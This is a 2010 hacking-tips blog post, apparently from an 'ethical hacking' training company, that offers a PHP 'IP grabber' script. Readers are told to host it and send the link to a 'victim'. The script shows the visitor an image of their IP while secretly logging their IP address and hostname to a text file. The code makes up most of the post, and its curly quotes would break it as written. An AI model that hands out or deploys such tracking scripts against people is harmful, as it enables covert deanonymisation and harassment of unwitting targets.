|
Call Sahil Baghla for Seminar, Workshop & Guest Lecture
|
Subscribe & Don't Miss A Free Ethical Hacking Course
Click Here for Company Website of EH1-Infotech Knowledge Solutions
Posted by
December 3, 2010

Ethical Hacking Tricks Level A ( For those who already knows little hacking and demanded real hacks trick)
This is an easy method to grab someones IP address using php scripts . What u all need to do is just copy the code below and paste it in notepad and save it as ip.php or anything.
Upload it on any free hosting websites (which support php) like www.ripway.com
Give the link to victim, as soon as the victim clicks on the link IP will be grabbed into a text file in the free hosting site.
Script to be used is :
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = ” This is Your IP/Proxy”;
$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;
$number2 = ” Host/Proxy: $hostname”;
$number4 = ” _________________________________”;
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header(“Content-type: image/png”);
imagepng($img_number);
$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);
$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;
fwrite($file, $file2);
fclose($file);
?>
Download IP Address Grabbing Script
Happy Ethical Hacking
IP Address grabbingfind ip address, find someone, find someones ip address, get ip address, get someone ip address, getting someones ip address, how do you get someones ip address, how to find out someones ip address, how to find someones address, how to find someones ip address, how to get someone ip address, how to get someones ip address, ip address, ip address locator
Did you enjoy this post? Why not leave a comment below and continue the conversation,
or subscribe to my Email and get articles like this delivered automatically to your Email.
 |
| EHacking | |
 |
| Website Hacking | |
 |
| Windows | |
 |
| Security | |
 |
| Facebook Hacking | |
 |
| Wifi- Hacking | |
 |
| Mobile Hacking | |
 |
| Reverse Engineering | |
 |
| Interesting Tricks | |
 |
| Linux | |
 |
| Programming | |
 |
| Hacking News | |
Salutations to all! Great site and content, even though definitely not all of it is functioning perfectly! However that is up to the actual website owner to deal with …